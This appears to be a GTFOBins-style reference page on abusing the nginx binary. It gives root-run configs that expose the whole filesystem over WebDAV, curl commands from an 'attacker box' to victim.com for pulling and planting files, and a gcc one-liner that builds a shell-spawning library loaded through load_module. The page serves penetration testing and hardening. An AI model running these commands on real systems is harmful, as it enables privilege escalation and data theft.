.. / nginx

Sponsor

Fork

Star

Sponsor

Fork

Star

• Upload
• Download
• Library load

Upload

This executable can upload local data.

• Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  cat >/path/to/temp-file <<EOF
  user root;
  http {
    server {
      listen 80;
      root /;
      autoindex on;
      dav_methods PUT;
    }
  }
  events {}
  EOF
  
  nginx -c /path/to/temp-file

  Receiver

  An HTTP client can be used on the attacker box to receive the data.

  curl victim.com -o /path/to/output-file

Download

This executable can download remote data.

• Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  cat >/path/to/temp-file <<EOF
  user root;
  http {
    server {
      listen 80;
      root /;
      autoindex on;
      dav_methods PUT;
    }
  }
  events {}
  EOF
  
  nginx -c /path/to/temp-file

  Sender

  An HTTP client can be used on the attacker box to send the data.

  curl -X PUT victim.com/path/to/output-file --data-binary @/path/to/input-file

Library load

This executable can load shared libraries that may be used to run arbitrary code in the same execution context.

• Comment

  Alternatively, the ssl_engine directive can be used.

  Unprivileged

  This function can be performed by any unprivileged user.

  cat >/path/to/temp-file <<EOF
  load_module /path/to/lib.so
  EOF
  
  nginx -t -c /path/to/temp-file

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  cat >/path/to/temp-file <<EOF
  load_module /path/to/lib.so
  EOF
  
  nginx -t -c /path/to/temp-file

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  cat >/path/to/temp-file <<EOF
  load_module /path/to/lib.so
  EOF
  
  nginx -t -c /path/to/temp-file

  Payload

  As an example, the following can be used to create a minimal shared library (lib.so) that spawns a shell upon loading:

  echo '__attribute__((constructor)) init() { execl("/bin/sh", "sh", 0); }' \
      | gcc -w -fPIC -shared -o lib.so -x c -
  

  Add the usual -p argument to the shell for SUID contexts. Consider calling setuid(0); beforehand if the executable has the CAP_SETUID capability assigned.

Source | History